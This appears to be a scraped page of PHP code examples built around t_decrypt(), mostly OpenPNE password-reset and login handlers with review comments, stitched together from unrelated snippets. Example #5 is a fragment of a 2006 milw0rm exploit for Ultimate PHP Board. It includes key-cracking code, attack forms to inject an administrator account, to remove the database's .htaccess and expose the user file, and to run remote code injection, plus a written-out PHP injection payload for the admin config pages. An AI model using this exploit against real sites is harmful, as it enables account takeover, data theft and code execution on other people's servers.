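/**
 * Mobile ("ktai") password-reset page: validates the reset link before showing the form.
 *
 * Reads 'session' (the reset token) and 'id' (the encrypted member id) from
 * $requests, checks the token against the member's stored password_reset_sid,
 * enforces the 24-hour lifetime, and passes both values on to the view.
 *
 * @param array $requests request variables; 'session' and 'id' are read
 * @return string 'success' when the link is valid
 */
function execute($requests)
 {
     // Redirect when external authentication is in use.
     check_action4pne_slave(true);

     // --- request variables
     $session = $requests['session'];
     $id = $requests['id'];
     // ----------

     // Recover the member id from the encrypted id carried in the link.
     $c_member_id = t_decrypt($id);

     // Authorization: a reset token and its issue time must both exist for this member.
     // NOTE(review): every check below relies on handle_kengen_error() ending the
     // request - confirm that it never returns.
     if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid')) {
         handle_kengen_error();
     }
     if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid_time')) {
         handle_kengen_error();
     }
     $c_member_config = db_member_c_member_config4c_member_id($c_member_id);

     // Authorization: the submitted token must match the stored one exactly.
     // Both sides are cast to string and compared with !== because a loose !=
     // compares numeric-looking strings by value ('0e1' == '0e2' is true), which
     // would let a different token pass. Where PHP >= 5.6 is guaranteed,
     // hash_equals() would additionally make the comparison constant-time.
     if ((string)$c_member_config['password_reset_sid'] !== (string)$session) {
         handle_kengen_error();
     }

     // The token is valid for 24 hours after it was issued.
     $one_day_time = 86400;
     $limit_password_reset_sid_time = $c_member_config['password_reset_sid_time'] + $one_day_time;
     if (time() > $limit_password_reset_sid_time) {
         $p = array('msg' => 55);
         openpne_redirect('ktai', 'page_o_login', $p);
         // openpne_redirect() may already end the request; the explicit exit
         // guarantees an expired token can never fall through to the form below.
         exit;
     }

     $this->set('session', $session);
     $this->set('id', $id);
     return 'success';
 }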
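 /**
  * PC password-reset action: validates the reset link, then stores the new password.
  *
  * Reads 'session' (the reset token), 'id' (the encrypted member id) and the two
  * password fields from $requests. On success the password is updated, the
  * reset token and its timestamp are deleted, and the user is redirected to the
  * login page; on validation failure the user is redirected back to the form.
  *
  * @param array $requests request variables: 'session', 'id', 'new_password', 'new_password2'
  */
 function execute($requests)
 {
     // Redirect when external authentication is in use.
     check_action4pne_slave(false);

     // --- request variables
     $session = $requests['session'];
     $id = $requests['id'];
     $new_password = $requests['new_password'];
     $new_password2 = $requests['new_password2'];
     // ----------

     // Recover the member id from the encrypted id carried in the link.
     $c_member_id = t_decrypt($id);

     // Authorization: a reset token and its issue time must both exist for this member.
     // NOTE(review): every check below relies on handle_kengen_error() ending the
     // request - confirm that it never returns.
     if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid')) {
         handle_kengen_error();
     }
     if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid_time')) {
         handle_kengen_error();
     }
     $c_member_config = db_member_c_member_config4c_member_id($c_member_id);

     // Authorization: the submitted token must match the stored one exactly.
     // Both sides are cast to string and compared with !== because a loose !=
     // compares numeric-looking strings by value ('0e1' == '0e2' is true), which
     // would let a different token pass. Where PHP >= 5.6 is guaranteed,
     // hash_equals() would additionally make the comparison constant-time.
     if ((string)$c_member_config['password_reset_sid'] !== (string)$session) {
         handle_kengen_error();
     }

     // The token is valid for 24 hours after it was issued.
     $one_day_time = 86400;
     $limit_password_reset_sid_time = $c_member_config['password_reset_sid_time'] + $one_day_time;
     if (time() > $limit_password_reset_sid_time) {
         $p = array('msg_code' => 'password_reset_timeout');
         openpne_redirect('pc', 'page_o_tologin', $p);
         // openpne_redirect() may already end the request; the explicit exit
         // guarantees an expired token can never reach the password update below.
         exit;
     }

     // Validate the new password; only the first message collected is shown.
     $msg_list = array();
     if (!$new_password) {
         $msg_list[] = "パスワードを入力してください";
     }
     if (!$new_password2) {
         $msg_list[] = "パスワード(確認)を入力してください";
     }
     if ($new_password !== $new_password2) {
         $msg_list[] = "パスワードが一致しません";
     }
     // Policy enforced here: 6 to 12 alphanumeric characters.
     if (!ctype_alnum($new_password) || strlen($new_password) < 6 || strlen($new_password) > 12) {
         $msg_list[] = "パスワードは6~12文字の半角英数で入力してください";
     }

     // error: send the user back to the form, passing the token and id along
     // so the form can be resubmitted.
     if ($msg_list) {
         $p = array('msg' => array_shift($msg_list), 'session' => $session, 'id' => $id);
         openpne_redirect('pc', 'page_o_password_reset', $p);
         exit;
     }

     db_member_update_password($c_member_id, $new_password);
     // Delete the token and its timestamp so the same link cannot be used again.
     db_member_delete_c_member_config($c_member_id, 'password_reset_sid_time');
     db_member_delete_c_member_config($c_member_id, 'password_reset_sid');

     $p = array('msg_code' => 'change_password');
     openpne_redirect('pc', 'page_o_tologin', $p);
 }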
Example #3
 /**
  * Mobile ("ktai") login page: prepares the values the login template displays.
  *
  * @param array $requests request variables; 'msg' and 'kad' are read
  * @return string 'success'
  */
 function execute($requests)
 {
     // When an external mobile login URL is configured and the built-in login
     // form is not to be displayed, send the client to that URL instead.
     $use_external_login = LOGIN_URL_KTAI && !DISPLAY_LOGIN;
     if ($use_external_login) {
         client_redirect_absolute(LOGIN_URL_KTAI);
     }

     // --- request variables
     $message_id = $requests['msg'];
     $encrypted_address = $requests['kad'];
     // ----------

     // Message looked up from the id in the request.
     $message = k_p_common_msg4msg_id($message_id);
     $this->set('msg', $message);

     // NOTE(review): 'kad' comes from the request and is shown after decryption;
     // confirm that the view escapes it on output.
     $ktai_address = t_decrypt($encrypted_address);
     $this->set('ktai_address', $ktai_address);

     $site_constants = array(
         'SNS_NAME' => SNS_NAME,
         'IS_CLOSED_SNS' => IS_CLOSED_SNS,
     );
     foreach ($site_constants as $view_key => $view_value) {
         $this->set($view_key, $view_value);
     }

     // inc_entry_point
     $entry_point = fetch_inc_entry_point($this->getView(), 'ktai_o_login');
     $this->set('inc_ktai_entry_point', $entry_point);

     return 'success';
 }
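 /**
  * Mobile ("ktai") password-reset action: validates the reset link, then stores the new password.
  *
  * Reads 'session' (the reset token), 'id' (the encrypted member id) and
  * 'new_password' from $requests. On success the password is updated, the
  * reset token and its timestamp are deleted, and the user is redirected to the
  * login page.
  *
  * @param array $requests request variables: 'session', 'id', 'new_password'
  */
 function execute($requests)
 {
     // Redirect when external authentication is in use.
     check_action4pne_slave(true);

     // --- request variables
     $session = $requests['session'];
     $id = $requests['id'];
     $new_password = $requests['new_password'];
     // ----------

     // Recover the member id from the encrypted id carried in the link.
     $c_member_id = t_decrypt($id);

     // Authorization: a reset token and its issue time must both exist for this member.
     // NOTE(review): every check below relies on handle_kengen_error() ending the
     // request - confirm that it never returns.
     if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid')) {
         handle_kengen_error();
     }
     if (!db_member_c_member_config4name($c_member_id, 'password_reset_sid_time')) {
         handle_kengen_error();
     }
     $c_member_config = db_member_c_member_config4c_member_id($c_member_id);

     // Authorization: the submitted token must match the stored one exactly.
     // Both sides are cast to string and compared with !== because a loose !=
     // compares numeric-looking strings by value ('0e1' == '0e2' is true), which
     // would let a different token pass. Where PHP >= 5.6 is guaranteed,
     // hash_equals() would additionally make the comparison constant-time.
     if ((string)$c_member_config['password_reset_sid'] !== (string)$session) {
         handle_kengen_error();
     }

     // The token is valid for 24 hours after it was issued.
     $one_day_time = 86400;
     $limit_password_reset_sid_time = $c_member_config['password_reset_sid_time'] + $one_day_time;
     if (time() > $limit_password_reset_sid_time) {
         $p = array('msg' => 55);
         openpne_redirect('ktai', 'page_o_login', $p);
         // openpne_redirect() may already end the request; the explicit exit
         // guarantees an expired token can never reach the password update below.
         exit;
     }

     // Is the new password a valid string? Policy: 6 to 12 alphanumeric characters.
     if (!ctype_alnum($new_password) || strlen($new_password) < 6 || strlen($new_password) > 12) {
         $p = array('msg' => 20, 'session' => $session, 'id' => $id);
         openpne_redirect('ktai', 'page_o_password_reset', $p);
         // Stop here so a rejected password is never stored, whether or not
         // openpne_redirect() returns.
         exit;
     }

     db_member_update_password($c_member_id, $new_password);
     // Delete the token and its timestamp so the same link cannot be used again.
     db_member_delete_c_member_config($c_member_id, 'password_reset_sid_time');
     db_member_delete_c_member_config($c_member_id, 'password_reset_sid');

     $p = array('msg' => 21);
     openpne_redirect('ktai', 'page_o_login', $p);
 }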
Example #5
                if (isset($_REQUEST['cypher']) && isset($_REQUEST['plain'])) {
                    $cypher_len = strlen($_REQUEST['cypher']);
                    $offset = gen_offset($_REQUEST['cypher'], $_REQUEST['plain']);
                    print "Offset:";
                    for ($x = 0; $x < $cypher_len; $x++) {
                        print $offset[$x] . ':';
                    }
                    print '<br>';
                    $validKeys = 0;
                    $y = 0;
                    for ($y = 255; $y >= 0; $y--) {
                        $newKey[$y] = gen_collision($offset, $y);
                        $key_len = strlen($newKey[$y]);
                        print "<br>Key:{$y}  = ";
                        for ($x = 0; $x <= $key_len; $x++) {
                            print $newKey[$y][$x];
                        }
                        print "<br>Cypher:" . t_encrypt($_REQUEST['plain'], $newKey[$y]);
                        print "<br>Plain     :" . t_decrypt($_REQUEST['cypher'], $newKey[$y]) . "<br><br>";
                    }
                    exit;
                }
            }
        }
    }
}
print "<title> Ultimate PHP Board Remote Code EXEC 0-Day </title>\n    \n    <CENTER><B><I>0-day</I></B></CENTER>\n     ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n    <B><I>Get Admin</I></B><br>\n    <B>Inject an administrative account into UPB:</B>\n    <p>\n    <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n    <p>\n    Path to attack:<i>(example: http://www.domain.ext/PathToUPB)</i><br>\n    <input name=\"addVict\" type=\"text\" size=60> <br>\n    Inject Name:<br>\n    <input name=\"addName\" type=\"text\" size=60> <br>\n    Inject Password:<br>\n    <input name=\"addPass\" type=\"text\" size=60> <br>\n    <p>    \n    <input type=\"submit\" value=\"Inject Admin\">     \n    </form>\n    \n    <p>\n    <B>PHP code injection is possilbe in the admin panel without an exploit.  Both admin_config.php and admin_config2.php can be used to execute PHP by tagging on: '  \";phpinfo(); \$crap=\"1  ' to any of the config values </B>( double quotes \" are only used in exploit)</B>\n    <p>  \n    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n    <B><I>Gain Read Access To The Database</I></B>\n\n   <form ACTION=" . $_SERVER['PHP_SELF'] . 
" method=\"post\"> \n    <p>\n    Removes  /db/.htaccess to allow access to the remote target's flat file database:<i>(example: http://www.domain.ext/PathToUPB  [no trailing slash]) (user database in /db/users.dat) </i><br><br>\n    <input name=\"victHTA\" type=\"text\" size=60> <br>\n    <p>    \n    <input type=\"submit\" value=\"Attack\">\n    </form>    \n    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n    <B><I>Crypto</I></B>  \n\t\n   <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n    <p>\n    Plain Text Password:<br>\n    <input name=\"encrypt\" type=\"text\" size=60> <br>\n    <p>    \n    <input type=\"submit\" value=\"Encrypt\">     \n    </form>\n    <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n    Encrypted Password:<br>\n    <input name=\"decrypt\" type=\"text\" size=60> <br>\n    <p>    \n    <input type=\"submit\" value=\"Decrypt\">     \n    </form>\n    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>  \n    <form ACTION=" . $_SERVER['PHP_SELF'] . " method=\"post\"> \n    <p>\n    Plain Text:<br>\n    <input name=\"plain\" type=\"text\" size=60> <br>\n    <p>    \n    corosponding cypher text:<br>\n    <input name=\"cypher\" type=\"text\" size=60> <br>\n    <p>    \n    <input type=\"submit\" value=\"crack key\">     \n    </form>\n    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br>\n   <B><I>Proof of Concept Only,  Unstable Remote Code Execution Using NON-SQL Database Injection</I></B>\n    <form ACTION=" . $_SERVER['PHP_SELF'] . 
" method=\"post\"> \n    <p>\n     perl CGI Code Injection Attack Remote Target:<br>\n    <input name=\"vict\" type=\"text\" size=60> <br>\n    <p>    \n    <input type=\"submit\" value=\"Attack\">\n    </form>\n    \n    <B>http://www.domain.ext/PathToUPB  (no trailing slash)</B>\n    </body>";
?>

# milw0rm.com [2006-06-20]
Example #6
/**
 * Fetch a member's c_member_secure row and return it with the address fields decrypted.
 *
 * Only pc_address, ktai_address and regist_address are passed through
 * t_decrypt(); easy_access_id and the hashed_* columns are returned as stored.
 *
 * @param mixed $c_member_id member id; coerced with intval() before it is bound
 * @return mixed the row as an array, or db_get_row()'s non-array result unchanged
 */
function db_member_c_member_secure4c_member_id($c_member_id)
{
    // The id is bound as a placeholder parameter, never concatenated into the SQL.
    $query = 'SELECT pc_address, ktai_address, regist_address, easy_access_id, hashed_password, hashed_password_query_answer FROM c_member_secure WHERE c_member_id = ?';
    $bind_params = array(intval($c_member_id));
    $row = db_get_row($query, $bind_params);

    // Nothing to decrypt when no row array came back; return the result as-is.
    if (!is_array($row)) {
        return $row;
    }

    $encrypted_columns = array('pc_address', 'ktai_address', 'regist_address');
    foreach ($encrypted_columns as $column) {
        $row[$column] = t_decrypt($row[$column]);
    }

    return $row;
}